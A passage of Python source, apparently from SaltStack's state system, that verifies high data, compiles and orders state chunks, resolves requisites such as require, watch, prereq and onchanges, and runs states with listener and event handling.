' require {1} in ID {2}').format(
data['__sls__'],
req,
data['__id__'])
errors.append(err)
return errors
def verify_high(self, high):
'''
Verify that the high data is viable and follows the data structure
'''
errors = []
if not isinstance(high, dict):
errors.append('High data is not a dictionary and is invalid')
reqs = {}
for name, body in six.iteritems(high):
try:
if name.startswith('__'):
continue
except AttributeError:
pass
if not isinstance(name, six.string_types):
errors.append(
'ID {0!r} in SLS {1!r} is not formed as a string, but '
'is a {2}. It may need to be quoted.'.format(
name, body['__sls__'], type(name).__name__)
)
if not isinstance(body, dict):
err = ('The type {0} in {1} is not formatted as a dictionary'
.format(name, body))
errors.append(err)
continue
for state in body:
if state.startswith('__'):
continue
if body[state] is None:
errors.append(
'ID {0!r} in SLS {1!r} contains a short declaration '
'({2}) with a trailing colon. When not passing any '
'arguments to a state, the colon must be omitted.'
.format(name, body['__sls__'], state)
)
continue
if not isinstance(body[state], list):
errors.append(
'State {0!r} in SLS {1!r} is not formed as a list'
.format(name, body['__sls__'])
)
else:
fun = 0
if '.' in state:
fun += 1
for arg in body[state]:
if isinstance(arg, six.string_types):
fun += 1
if ' ' in arg.strip():
errors.append(('The function "{0}" in state '
'"{1}" in SLS "{2}" has '
'whitespace, a function with whitespace is '
'not supported, perhaps this is an argument '
'that is missing a ":"').format(
arg,
name,
body['__sls__']))
elif isinstance(arg, dict):
# The arg is a dict, if the arg is require or
# watch, it must be a list.
#
# Add the requires to the reqs dict and check them
# all for recursive requisites.
argfirst = next(iter(arg))
if argfirst == 'names':
if not isinstance(arg[argfirst], list):
errors.append(
'The \'names\' argument in state '
'{0!r} in SLS {1!r} needs to be '
'formed as a list'
.format(name, body['__sls__'])
)
if argfirst in ('require', 'watch', 'prereq'):
if not isinstance(arg[argfirst], list):
errors.append(
'The {0} statement in state {1!r} in '
'SLS {2!r} needs to be formed as a '
'list'.format(argfirst,
name,
body['__sls__'])
)
# It is a list, verify that the members of the
# list are all single key dicts.
else:
reqs[name] = {'state': state}
for req in arg[argfirst]:
if not isinstance(req, dict):
err = ('Requisite declaration {0}'
' in SLS {1} is not formed as a'
' single key dictionary').format(
req,
body['__sls__'])
errors.append(err)
continue
req_key = next(iter(req))
req_val = req[req_key]
if '.' in req_key:
errors.append((
'Invalid requisite type {0!r} '
'in state {1!r}, in SLS '
'{2!r}. Requisite types must '
'not contain dots, did you '
'mean {3!r}?'.format(
req_key,
name,
body['__sls__'],
req_key[:req_key.find('.')]
)
))
if not ishashable(req_val):
errors.append((
'Illegal requisite "{0}", '
'please check your syntax.\n'
).format(str(req_val)))
continue
# Check for global recursive requisites
reqs[name][req_val] = req_key
# I am going beyond 80 chars on
# purpose, this is just too much
# of a pain to deal with otherwise
if req_val in reqs:
if name in reqs[req_val]:
if reqs[req_val][name] == state:
if reqs[req_val]['state'] == reqs[name][req_val]:
err = ('A recursive '
'requisite was found, SLS '
'"{0}" ID "{1}" ID "{2}"'
).format(
body['__sls__'],
name,
req_val
)
errors.append(err)
# Make sure that there is only one key in the
# dict
if len(list(arg)) != 1:
errors.append(
'Multiple dictionaries defined in '
'argument of state {0!r} in SLS {1!r}'
.format(name, body['__sls__'])
)
if not fun:
if state == 'require' or state == 'watch':
continue
errors.append(
'No function declared in state {0!r} in SLS {1!r}'
.format(state, body['__sls__'])
)
elif fun > 1:
errors.append(
'Too many functions declared in state {0!r} in '
'SLS {1!r}'.format(state, body['__sls__'])
)
return errors
def verify_chunks(self, chunks):
'''
Verify the chunks in a list of low data structures
'''
err = []
for chunk in chunks:
err += self.verify_data(chunk)
return err
def order_chunks(self, chunks):
'''
Sort the chunk list verifying that the chunks follow the order
specified in the order options.
'''
cap = 1
for chunk in chunks:
if 'order' in chunk:
if not isinstance(chunk['order'], int):
continue
chunk_order = chunk['order']
if chunk_order > cap - 1 and chunk_order > 0:
cap = chunk_order + 100
for chunk in chunks:
if 'order' not in chunk:
chunk['order'] = cap
continue
if not isinstance(chunk['order'], (int, float)):
if chunk['order'] == 'last':
chunk['order'] = cap + 1000000
else:
chunk['order'] = cap
if 'name_order' in chunk:
chunk['order'] = chunk['order'] + chunk.pop('name_order') / 10000.0
if chunk['order'] < 0:
chunk['order'] = cap + 1000000 + chunk['order']
chunks.sort(key=lambda chunk: (chunk['order'], '{0[state]}{0[name]}{0[fun]}'.format(chunk)))
return chunks
def compile_high_data(self, high):
'''
"Compile" the high data as it is retrieved from the CLI or YAML into
the individual state executor structures
'''
chunks = []
for name, body in six.iteritems(high):
if name.startswith('__'):
continue
for state, run in six.iteritems(body):
funcs = set()
names = set()
if state.startswith('__'):
continue
chunk = {'state': state,
'name': name}
if '__sls__' in body:
chunk['__sls__'] = body['__sls__']
if '__env__' in body:
chunk['__env__'] = body['__env__']
chunk['__id__'] = name
for arg in run:
if isinstance(arg, six.string_types):
funcs.add(arg)
continue
if isinstance(arg, dict):
for key, val in six.iteritems(arg):
if key == 'names':
names.update(val)
elif key == 'state':
# Don't pass down a state override
continue
elif (key == 'name' and
not isinstance(val, six.string_types)):
# Invalid name, fall back to ID
chunk[key] = name
else:
chunk[key] = val
if names:
name_order = 1
for entry in names:
live = copy.deepcopy(chunk)
if isinstance(entry, dict):
low_name = next(six.iterkeys(entry))
live['name'] = low_name
live.update(entry[low_name][0])
else:
live['name'] = entry
live['name_order'] = name_order
name_order = name_order + 1
for fun in funcs:
live['fun'] = fun
chunks.append(live)
else:
live = copy.deepcopy(chunk)
for fun in funcs:
live['fun'] = fun
chunks.append(live)
chunks = self.order_chunks(chunks)
return chunks
def reconcile_extend(self, high):
'''
Pull the extend data and add it to the respective high data
'''
errors = []
if '__extend__' not in high:
return high, errors
ext = high.pop('__extend__')
for ext_chunk in ext:
for name, body in six.iteritems(ext_chunk):
if name not in high:
state_type = next(
x for x in body if not x.startswith('__')
)
# Check for a matching 'name' override in high data
id_ = find_name(name, state_type, high)
if id_:
name = id_
else:
errors.append(
'Cannot extend ID \'{0}\' in \'{1}:{2}\'. It is not '
'part of the high state.\n'
'This is likely due to a missing include statement '
'or an incorrectly typed ID.\nEnsure that a '
'state with an ID of \'{0}\' is available\nin '
'environment \'{1}\' and to SLS \'{2}\''.format(
name,
body.get('__env__', 'base'),
body.get('__sls__', 'base'))
)
continue
for state, run in six.iteritems(body):
if state.startswith('__'):
continue
if state not in high[name]:
high[name][state] = run
continue
# high[name][state] is extended by run, both are lists
for arg in run:
update = False
for hind in range(len(high[name][state])):
if isinstance(arg, six.string_types) and isinstance(high[name][state][hind], six.string_types):
# replacing the function, replace the index
high[name][state].pop(hind)
high[name][state].insert(hind, arg)
update = True
continue
if isinstance(arg, dict) and isinstance(high[name][state][hind], dict):
# It is an option, make sure the options match
argfirst = next(iter(arg))
if argfirst == next(iter(high[name][state][hind])):
# If argfirst is a requisite then we must merge
# our requisite with that of the target state
if argfirst in STATE_REQUISITE_KEYWORDS:
high[name][state][hind][argfirst].extend(arg[argfirst])
# otherwise, its not a requisite and we are just extending (replacing)
else:
high[name][state][hind] = arg
update = True
if (argfirst == 'name' and
next(iter(high[name][state][hind])) == 'names'):
# If names are overwritten by name use the name
high[name][state][hind] = arg
if not update:
high[name][state].append(arg)
return high, errors
def apply_exclude(self, high):
'''
Read in the __exclude__ list and remove all excluded objects from the
high data
'''
if '__exclude__' not in high:
return high
ex_sls = set()
ex_id = set()
exclude = high.pop('__exclude__')
for exc in exclude:
if isinstance(exc, str):
# The exclude statement is a string, assume it is an sls
ex_sls.add(exc)
if isinstance(exc, dict):
# Explicitly declared exclude
if len(exc) != 1:
continue
key = next(six.iterkeys(exc))
if key == 'sls':
ex_sls.add(exc['sls'])
elif key == 'id':
ex_id.add(exc['id'])
# Now the excludes have been simplified, use them
if ex_sls:
# There are sls excludes, find the associated ids
for name, body in six.iteritems(high):
if name.startswith('__'):
continue
sls = body.get('__sls__', '')
if not sls:
continue
for ex_ in ex_sls:
if fnmatch.fnmatch(sls, ex_):
ex_id.add(name)
for id_ in ex_id:
if id_ in high:
high.pop(id_)
return high
def requisite_in(self, high):
'''
Extend the data reference with requisite_in arguments
'''
req_in = set([
'require_in',
'watch_in',
'onfail_in',
'onchanges_in',
'use',
'use_in',
'prereq',
'prereq_in',
])
req_in_all = req_in.union(
set([
'require',
'watch',
'onfail',
'onchanges',
]))
extend = {}
errors = []
for id_, body in six.iteritems(high):
if not isinstance(body, dict):
continue
for state, run in six.iteritems(body):
if state.startswith('__'):
continue
for arg in run:
if isinstance(arg, dict):
# It is not a function, verify that the arg is a
# requisite in statement
if len(arg) < 1:
# Empty arg dict
# How did we get this far?
continue
# Split out the components
key = next(iter(arg))
if key not in req_in:
continue
rkey = key.split('_')[0]
items = arg[key]
if isinstance(items, dict):
# Formatted as a single req_in
for _state, name in six.iteritems(items):
# Not a use requisite_in
found = False
if name not in extend:
extend[name] = {}
if '.' in _state:
errors.append((
'Invalid requisite in {0}: {1} for '
'{2}, in SLS {3!r}. Requisites must '
'not contain dots, did you mean {4!r}?'
.format(
rkey,
_state,
name,
body['__sls__'],
_state[:_state.find('.')]
)
))
_state = _state.split(".")[0]
if _state not in extend[name]:
extend[name][_state] = []
extend[name]['__env__'] = body['__env__']
extend[name]['__sls__'] = body['__sls__']
for ind in range(len(extend[name][_state])):
if next(iter(
extend[name][_state][ind])) == rkey:
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append(
{rkey: [{state: id_}]}
)
if isinstance(items, list):
# Formed as a list of requisite additions
for ind in items:
if not isinstance(ind, dict):
# Malformed req_in
continue
if len(ind) < 1:
continue
_state = next(iter(ind))
name = ind[_state]
if '.' in _state:
errors.append((
'Invalid requisite in {0}: {1} for '
'{2}, in SLS {3!r}. Requisites must '
'not contain dots, did you mean {4!r}?'
.format(
rkey,
_state,
name,
body['__sls__'],
_state[:_state.find('.')]
)
))
_state = _state.split(".")[0]
if key == 'prereq_in':
# Add prerequired to origin
if id_ not in extend:
extend[id_] = {}
if state not in extend[id_]:
extend[id_][state] = []
extend[id_][state].append(
{'prerequired': [{_state: name}]}
)
if key == 'prereq':
# Add prerequired to prereqs
ext_id = find_name(name, _state, high)
if not ext_id:
continue
if ext_id not in extend:
extend[ext_id] = {}
if _state not in extend[ext_id]:
extend[ext_id][_state] = []
extend[ext_id][_state].append(
{'prerequired': [{state: id_}]}
)
continue
if key == 'use_in':
# Add the running states args to the
# use_in states
ext_id = find_name(name, _state, high)
if not ext_id:
continue
ext_args = state_args(ext_id, _state, high)
if ext_id not in extend:
extend[ext_id] = {}
if _state not in extend[ext_id]:
extend[ext_id][_state] = []
ignore_args = req_in_all.union(ext_args)
for arg in high[id_][state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(six.iterkeys(arg)) == 'name':
continue
if next(six.iterkeys(arg)) == 'names':
continue
extend[ext_id][_state].append(arg)
continue
if key == 'use':
# Add the use state's args to the
# running state
ext_id = find_name(name, _state, high)
if not ext_id:
continue
loc_args = state_args(id_, state, high)
if id_ not in extend:
extend[id_] = {}
if state not in extend[id_]:
extend[id_][state] = []
ignore_args = req_in_all.union(loc_args)
for arg in high[ext_id][_state]:
if not isinstance(arg, dict):
continue
if len(arg) != 1:
continue
if next(iter(arg)) in ignore_args:
continue
# Don't use name or names
if next(six.iterkeys(arg)) == 'name':
continue
if next(six.iterkeys(arg)) == 'names':
continue
extend[id_][state].append(arg)
continue
found = False
if name not in extend:
extend[name] = {}
if _state not in extend[name]:
extend[name][_state] = []
extend[name]['__env__'] = body['__env__']
extend[name]['__sls__'] = body['__sls__']
for ind in range(len(extend[name][_state])):
if next(iter(
extend[name][_state][ind])) == rkey:
# Extending again
extend[name][_state][ind][rkey].append(
{state: id_}
)
found = True
if found:
continue
# The rkey is not present yet, create it
extend[name][_state].append(
{rkey: [{state: id_}]}
)
high['__extend__'] = []
for key, val in six.iteritems(extend):
high['__extend__'].append({key: val})
req_in_high, req_in_errors = self.reconcile_extend(high)
errors.extend(req_in_errors)
return req_in_high, errors
def call(self, low, chunks=None, running=None):
'''
Call a state directly with the low data structure, verify data
before processing.
'''
start_time = datetime.datetime.now()
log.info('Running state [{0}] at time {1}'.format(low['name'], start_time.time().isoformat()))
errors = self.verify_data(low)
if errors:
ret = {
'result': False,
'name': low['name'],
'changes': {},
'comment': '',
}
for err in errors:
ret['comment'] += '{0}\n'.format(err)
ret['__run_num__'] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
return ret
else:
ret = {'result': False, 'name': low['name'], 'changes': {}}
if not low.get('__prereq__'):
log.info(
'Executing state {0[state]}.{0[fun]} for {0[name]}'.format(
low
)
)
if 'provider' in low:
self.load_modules(low)
state_func_name = '{0[state]}.{0[fun]}'.format(low)
cdata = salt.utils.format_call(
self.states[state_func_name],
low,
initial_ret={'full': state_func_name},
expected_extra_kws=STATE_INTERNAL_KEYWORDS
)
inject_globals = {
# Pass a copy of the running dictionary, the low state chunks and
# the current state dictionaries.
# We pass deep copies here because we don't want any misbehaving
# state module to change these at runtime.
'__low__': immutabletypes.freeze(low),
'__running__': immutabletypes.freeze(running) if running else {},
'__instance_id__': self.instance_id,
'__lowstate__': immutabletypes.freeze(chunks) if chunks else {}
}
if low.get('__prereq__'):
test = sys.modules[self.states[cdata['full']].__module__].__opts__['test']
sys.modules[self.states[cdata['full']].__module__].__opts__['test'] = True
try:
# Let's get a reference to the salt environment to use within this
# state call.
#
# If the state function accepts an 'env' keyword argument, it
# allows the state to be overridden(we look for that in cdata). If
# that's not found in cdata, we look for what we're being passed in
# the original data, namely, the special dunder __env__. If that's
# not found we default to 'base'
if ('unless' in low and '{0[state]}.mod_run_check'.format(low) not in self.states) or \
('onlyif' in low and '{0[state]}.mod_run_check'.format(low) not in self.states):
ret.update(self._run_check(low))
if 'saltenv' in low:
inject_globals['__env__'] = str(low['saltenv'])
elif isinstance(cdata['kwargs'].get('env', None), six.string_types):
# User is using a deprecated env setting which was parsed by
# format_call.
# We check for a string type since module functions which
# allow setting the OS environ also make use of the "env"
# keyword argument, which is not a string
inject_globals['__env__'] = str(cdata['kwargs']['env'])
elif '__env__' in low:
# The user is passing an alternative environment using __env__
# which is also not the appropriate choice, still, handle it
inject_globals['__env__'] = str(low['__env__'])
else:
# Let's use the default environment
inject_globals['__env__'] = 'base'
if 'result' not in ret or ret['result'] is False:
with context.func_globals_inject(self.states[cdata['full']],
**inject_globals):
ret = self.states[cdata['full']](*cdata['args'],
**cdata['kwargs'])
if 'check_cmd' in low and '{0[state]}.mod_run_check_cmd'.format(low) not in self.states:
ret.update(self._run_check_cmd(low))
self.verify_ret(ret)
except Exception:
trb = traceback.format_exc()
# There are a number of possibilities to not have the cdata
# populated with what we might have expected, so just be smart
# enough to not raise another KeyError as the name is easily
# guessable and fallback in all cases to present the real
# exception to the user
if len(cdata['args']) > 0:
name = cdata['args'][0]
elif 'name' in cdata['kwargs']:
name = cdata['kwargs']['name']
else:
name = low.get('name', low.get('__id__'))
ret = {
'result': False,
'name': name,
'changes': {},
'comment': 'An exception occurred in this state: {0}'.format(
trb)
}
finally:
if low.get('__prereq__'):
sys.modules[self.states[cdata['full']].__module__].__opts__[
'test'] = test
# If format_call got any warnings, let's show them to the user
if 'warnings' in cdata:
ret.setdefault('warnings', []).extend(cdata['warnings'])
if 'provider' in low:
self.load_modules()
if low.get('__prereq__'):
low['__prereq__'] = False
return ret
ret['__run_num__'] = self.__run_num
self.__run_num += 1
format_log(ret)
self.check_refresh(low, ret)
finish_time = datetime.datetime.now()
ret['start_time'] = start_time.time().isoformat()
delta = (finish_time - start_time)
# duration in milliseconds.microseconds
ret['duration'] = (delta.seconds * 1000000 + delta.microseconds)/1000.0
log.info('Completed state [{0}] at time {1}'.format(low['name'], finish_time.time().isoformat()))
return ret
def call_chunks(self, chunks):
'''
Iterate over a list of chunks and call them, checking for requires.
'''
running = {}
for low in chunks:
if '__FAILHARD__' in running:
running.pop('__FAILHARD__')
return running
tag = _gen_tag(low)
if tag not in running:
running = self.call_chunk(low, running, chunks)
if self.check_failhard(low, running):
return running
self.active = set()
return running
def check_failhard(self, low, running):
'''
Check if the low data chunk should send a failhard signal
'''
tag = _gen_tag(low)
if (low.get('failhard', False) or self.opts['failhard']
and tag in running):
return not running[tag]['result']
return False
def check_requisite(self, low, running, chunks, pre=False):
'''
Look into the running data to check the status of all requisite
states
'''
present = False
# If mod_watch is not available make it a require
if 'watch' in low:
if '{0}.mod_watch'.format(low['state']) not in self.states:
if 'require' in low:
low['require'].extend(low.pop('watch'))
else:
low['require'] = low.pop('watch')
else:
present = True
if 'require' in low:
present = True
if 'prerequired' in low:
present = True
if 'prereq' in low:
present = True
if 'onfail' in low:
present = True
if 'onchanges' in low:
present = True
if not present:
return 'met', ()
reqs = {
'require': [],
'watch': [],
'prereq': [],
'onfail': [],
'onchanges': []}
if pre:
reqs['prerequired'] = []
for r_state in reqs:
if r_state in low and low[r_state] is not None:
for req in low[r_state]:
req = trim_req(req)
found = False
for chunk in chunks:
req_key = next(iter(req))
req_val = req[req_key]
if req_val is None:
continue
if req_key == 'sls':
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk['__sls__'], req_val):
found = True
reqs[r_state].append(chunk)
continue
if (fnmatch.fnmatch(chunk['name'], req_val) or
fnmatch.fnmatch(chunk['__id__'], req_val)):
if chunk['state'] == req_key:
found = True
reqs[r_state].append(chunk)
if not found:
return 'unmet', ()
fun_stats = set()
for r_state, chunks in six.iteritems(reqs):
if r_state == 'prereq':
run_dict = self.pre
else:
run_dict = running
for chunk in chunks:
tag = _gen_tag(chunk)
if tag not in run_dict:
fun_stats.add('unmet')
continue
if r_state == 'onfail':
if run_dict[tag]['result'] is True:
fun_stats.add('onfail')
continue
else:
if run_dict[tag]['result'] is False:
fun_stats.add('fail')
continue
if r_state == 'onchanges':
if not run_dict[tag]['changes']:
fun_stats.add('onchanges')
else:
fun_stats.add('onchangesmet')
continue
if r_state == 'watch' and run_dict[tag]['changes']:
fun_stats.add('change')
continue
if r_state == 'prereq' and run_dict[tag]['result'] is None:
fun_stats.add('premet')
if r_state == 'prereq' and not run_dict[tag]['result'] is None:
fun_stats.add('pre')
else:
fun_stats.add('met')
if 'unmet' in fun_stats:
status = 'unmet'
elif 'fail' in fun_stats:
status = 'fail'
elif 'pre' in fun_stats:
if 'premet' in fun_stats:
status = 'met'
else:
status = 'pre'
elif 'onfail' in fun_stats:
status = 'onfail'
elif 'onchanges' in fun_stats and 'onchangesmet' not in fun_stats:
status = 'onchanges'
elif 'change' in fun_stats:
status = 'change'
else:
status = 'met'
return status, reqs
def event(self, chunk_ret, length, fire_event=False):
'''
Fire an event on the master bus
If `fire_event` is set to True an event will be sent with the
chunk name in the tag and the chunk result in the event data.
If `fire_event` is set to a string such as `mystate/is/finished`,
an event will be sent with the string added to the tag and the chunk
result in the event data.
If the `state_events` is set to True in the config, then after the
chunk is evaluated an event will be set up to the master with the
results.
'''
if not self.opts.get('local') and (self.opts.get('state_events', True) or fire_event) and self.opts.get('master_uri'):
ret = {'ret': chunk_ret}
if fire_event is True:
tag = salt.utils.event.tagify(
[self.jid, self.opts['id'], str(chunk_ret['name'])], 'state_result'
)
elif isinstance(fire_event, six.string_types):
tag = salt.utils.event.tagify(
[self.jid, self.opts['id'], str(fire_event)], 'state_result'
)
else:
tag = salt.utils.event.tagify(
[self.jid, 'prog', self.opts['id'], str(chunk_ret['__run_num__'])], 'job'
)
ret['len'] = length
preload = {'jid': self.jid}
self.functions['event.fire_master'](ret, tag, preload=preload)
def call_chunk(self, low, running, chunks):
'''
Check if a chunk has any requires, execute the requires and then
the chunk
'''
low = self._mod_aggregate(low, running, chunks)
self._mod_init(low)
tag = _gen_tag(low)
if not low.get('prerequired'):
self.active.add(tag)
requisites = ['require', 'watch', 'prereq', 'onfail', 'onchanges']
if not low.get('__prereq__'):
requisites.append('prerequired')
status, reqs = self.check_requisite(low, running, chunks, True)
else:
status, reqs = self.check_requisite(low, running, chunks)
if status == 'unmet':
lost = {}
reqs = []
for requisite in requisites:
lost[requisite] = []
if requisite not in low:
continue
for req in low[requisite]:
req = trim_req(req)
found = False
for chunk in chunks:
req_key = next(iter(req))
req_val = req[req_key]
if req_val is None:
continue
if req_key == 'sls':
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk['__sls__'], req_val):
if requisite == 'prereq':
chunk['__prereq__'] = True
reqs.append(chunk)
found = True
continue
if (fnmatch.fnmatch(chunk['name'], req_val) or
fnmatch.fnmatch(chunk['__id__'], req_val)):
if chunk['state'] == req_key:
if requisite == 'prereq':
chunk['__prereq__'] = True
elif requisite == 'prerequired':
chunk['__prerequired__'] = True
reqs.append(chunk)
found = True
if not found:
lost[requisite].append(req)
if lost['require'] or lost['watch'] or lost['prereq'] or lost['onfail'] or lost['onchanges'] or lost.get('prerequired'):
comment = 'The following requisites were not found:\n'
for requisite, lreqs in six.iteritems(lost):
if not lreqs:
continue
comment += \
'{0}{1}:\n'.format(' ' * 19, requisite)
for lreq in lreqs:
req_key = next(iter(lreq))
req_val = lreq[req_key]
comment += \
'{0}{1}: {2}\n'.format(' ' * 23, req_key, req_val)
running[tag] = {'changes': {},
'result': False,
'comment': comment,
'__run_num__': self.__run_num,
'__sls__': low['__sls__']}
self.__run_num += 1
self.event(running[tag], len(chunks), fire_event=low.get('fire_event'))
return running
for chunk in reqs:
# Check to see if the chunk has been run, only run it if
# it has not been run already
ctag = _gen_tag(chunk)
if ctag not in running:
if ctag in self.active:
if chunk.get('__prerequired__'):
# Prereq recusive, run this chunk with prereq on
if tag not in self.pre:
low['__prereq__'] = True
self.pre[ctag] = self.call(low, chunks, running)
return running
else:
return running
elif ctag not in running:
log.error('Recursive requisite found')
running[tag] = {
'changes': {},
'result': False,
'comment': 'Recursive requisite found',
'__run_num__': self.__run_num,
'__sls__': low['__sls__']}
self.__run_num += 1
self.event(running[tag], len(chunks), fire_event=low.get('fire_event'))
return running
running = self.call_chunk(chunk, running, chunks)
if self.check_failhard(chunk, running):
running['__FAILHARD__'] = True
return running
if low.get('__prereq__'):
status, reqs = self.check_requisite(low, running, chunks)
self.pre[tag] = self.call(low, chunks, running)
if not self.pre[tag]['changes'] and status == 'change':
self.pre[tag]['changes'] = {'watch': 'watch'}
self.pre[tag]['result'] = None
else:
running = self.call_chunk(low, running, chunks)
if self.check_failhard(chunk, running):
running['__FAILHARD__'] = True
return running
elif status == 'met':
if low.get('__prereq__'):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
elif status == 'fail':
# if the requisite that failed was due to a prereq on this low state
# show the normal error
if tag in self.pre:
running[tag] = self.pre[tag]
running[tag]['__run_num__'] = self.__run_num
running[tag]['__sls__'] = low['__sls__']
# otherwise the failure was due to a requisite down the chain
else:
# determine what the requisite failures where, and return
# a nice error message
failed_requisites = set()
# look at all requisite types for a failure
for req_lows in six.itervalues(reqs):
for req_low in req_lows:
req_tag = _gen_tag(req_low)
req_ret = self.pre.get(req_tag, running.get(req_tag))
# if there is no run output for the requisite it
# can't be the failure
if req_ret is None:
continue
# If the result was False (not None) it was a failure
if req_ret['result'] is False:
# use SLS.ID for the key-- so its easier to find
key = '{sls}.{_id}'.format(sls=req_low['__sls__'],
_id=req_low['__id__'])
failed_requisites.add(key)
_cmt = 'One or more requisite failed: {0}'.format(
', '.join(str(i) for i in failed_requisites)
)
running[tag] = {
'changes': {},
'result': False,
'comment': _cmt,
'__run_num__': self.__run_num,
'__sls__': low['__sls__']
}
self.__run_num += 1
elif status == 'change' and not low.get('__prereq__'):
ret = self.call(low, chunks, running)
if not ret['changes'] and not ret.get('skip_watch', False):
low = low.copy()
low['sfun'] = low['fun']
low['fun'] = 'mod_watch'
low['__reqs__'] = reqs
ret = self.call(low, chunks, running)
running[tag] = ret
elif status == 'pre':
pre_ret = {'changes': {},
'result': True,
'comment': 'No changes detected',
'__run_num__': self.__run_num,
'__sls__': low['__sls__']}
running[tag] = pre_ret
self.pre[tag] = pre_ret
self.__run_num += 1
elif status == 'onfail':
running[tag] = {'changes': {},
'result': True,
'comment': 'State was not run because onfail req did not change',
'__run_num__': self.__run_num,
'__sls__': low['__sls__']}
self.__run_num += 1
elif status == 'onchanges':
running[tag] = {'changes': {},
'result': True,
'comment': 'State was not run because none of the onchanges reqs changed',
'__run_num__': self.__run_num,
'__sls__': low['__sls__']}
self.__run_num += 1
else:
if low.get('__prereq__'):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
if tag in running:
self.event(running[tag], len(chunks), fire_event=low.get('fire_event'))
return running
def call_listen(self, chunks, running):
'''
Find all of the listen routines and call the associated mod_watch runs
'''
listeners = []
crefs = {}
for chunk in chunks:
crefs[(chunk['state'], chunk['name'])] = chunk
crefs[(chunk['state'], chunk['__id__'])] = chunk
if 'listen' in chunk:
listeners.append({(chunk['state'], chunk['name']): chunk['listen']})
if 'listen_in' in chunk:
for l_in in chunk['listen_in']:
for key, val in six.iteritems(l_in):
listeners.append({(key, val): [{chunk['state']: chunk['name']}]})
mod_watchers = []
errors = {}
for l_dict in listeners:
for key, val in six.iteritems(l_dict):
for listen_to in val:
if not isinstance(listen_to, dict):
continue
for lkey, lval in six.iteritems(listen_to):
if (lkey, lval) not in crefs:
rerror = {_l_tag(lkey, lval):
{
'comment': 'Referenced state {0}: {1} does not exist'.format(lkey, lval),
'name': 'listen_{0}:{1}'.format(lkey, lval),
'result': False,
'changes': {}
}}
errors.update(rerror)
continue
to_tag = _gen_tag(crefs[(lkey, lval)])
if to_tag not in running:
continue
if running[to_tag]['changes']:
if key not in crefs:
rerror = {_l_tag(key[0], key[1]):
{'comment': 'Referenced state {0}: {1} does not exist'.format(key[0], key[1]),
'name': 'listen_{0}:{1}'.format(key[0], key[1]),
'result': False,
'changes': {}}}
errors.update(rerror)
continue
chunk = crefs[key]
low = chunk.copy()
low['sfun'] = chunk['fun']
low['fun'] = 'mod_watch'
low['__id__'] = 'listener_{0}'.format(low['__id__'])
for req in STATE_REQUISITE_KEYWORDS:
if req in low:
low.pop(req)
mod_watchers.append(low)
ret = self.call_chunks(mod_watchers)
running.update(ret)
for err in errors:
errors[err]['__run_num__'] = self.__run_num
self.__run_num += 1
running.update(errors)
return running
def call_high(self, high):
'''
Process a high data call and ensure the defined states.
'''
errors = []
# If there is extension data reconcile it
high, ext_errors = self.reconcile_extend(high)
errors += ext_errors
errors += self.verify_high(high)
if errors:
return errors
high, req_in_errors = self.requisite_in(high)
errors += req_in_errors
high = self.apply_exclude(high)
# Verify that the high data is structurally sound
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.compile_high_data(high)
# Check for any disabled states
disabled = {}
if 'state_runs_disabled' in self.opts['grains']:
_chunks = copy.deepcopy(chunks)
for low in _chunks:
state_ = '{0}.{1}'.format(low['state'], low['fun'])
for pat in self.opts['grains']['state_runs_disabled']:
if fnmatch.fnmatch(state_, pat):
comment = (
'The state function "{0}" is currently disabled by "{1}", '
'to re-enable, run state.enable {1}.'
).format(
state_,
pat,
)
_tag = _gen_tag(low)
disabled[_tag] = {'changes': {},
'result': False,
'comment': comment,
'__run_num__': self.__run_num,
'__sls__': low['__sls__']}
self.__run_num += 1
chunks.remove(low)
break
# If there are extensions in the highstate, process them and update
# the low data chunks
if errors:
return errors
ret = dict(list(disabled.items()) + list(self.call_chunks(chunks).items()))
ret = self.call_listen(chunks, ret)
def _cleanup_accumulator_data():
accum_data_path = os.path.join(
salt.utils.get_accumulator_dir(self.opts['cachedir']),
self.instance_id
)
try:
os.remove(accum_data_path)
log.debug('Deleted accumulator data file {0}'.format(
accum_data_path)
)
except OSError:
log.debug('File {0} does not exist, no need to cleanup.'.format(
accum_data_path)
)
_cleanup_accumulator_data()
return ret
def render_template(self, high, template):
errors = []
if not high:
return high, errors
if not isinstance(high, dict):
errors.append(
'Template {0} does not render to a dictionary'.format(template)
)
return high, errors
invalid_items = ('include', 'exclude', 'extends')
for item in invalid_items:
if item in high:
errors.append(
'The \'{0}\' declaration found on \'{1}\' is invalid when '
'rendering single templates'.format(item, template)
)
return high, errors
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], six.string_types):
# Is this is a short state, it needs to be padded
if '.' in high[name]:
comps = high[name].split('.')
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
errors.append(
'ID {0} in template {1} is not a dictionary'.format(
name, template
)
)
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith('_'):
continue
if high[name][key] is None:
errors.append(
'ID {0!r} in template {1} contains a short '
'declaration ({2}) with a trailing colon. When not '
'passing any arguments to a state, the colon must be '
'omitted.'.format(name, template, key)
)
continue
if not isinstance(high[name][key], list):
continue
if '.' in key:
comps = key.split('.')
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
'ID {0!r} in template {1!r} contains multiple '
'state declarations of the same type'
.format(name, template)
)
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high, errors
def call_template(self, template):
'''
Enforce the states in a template
'''
high = compile_template(
template, self.rend, self.opts['renderer'])
if not high:
return high
high, errors = self.render_template(high, template)
if errors:
return errors
return self.call_high(high)
def call_template_str(self, template):
'''
Enforce the states in a template, pass the template as a string
'''
high = compile_template_str(
template, self.rend, self.opts['renderer'])
if not high:
return high
high, errors = self.render_template(high, '<template-str>')
if errors:
return errors
return self.call_high(high)
class BaseHighState(object):
'''
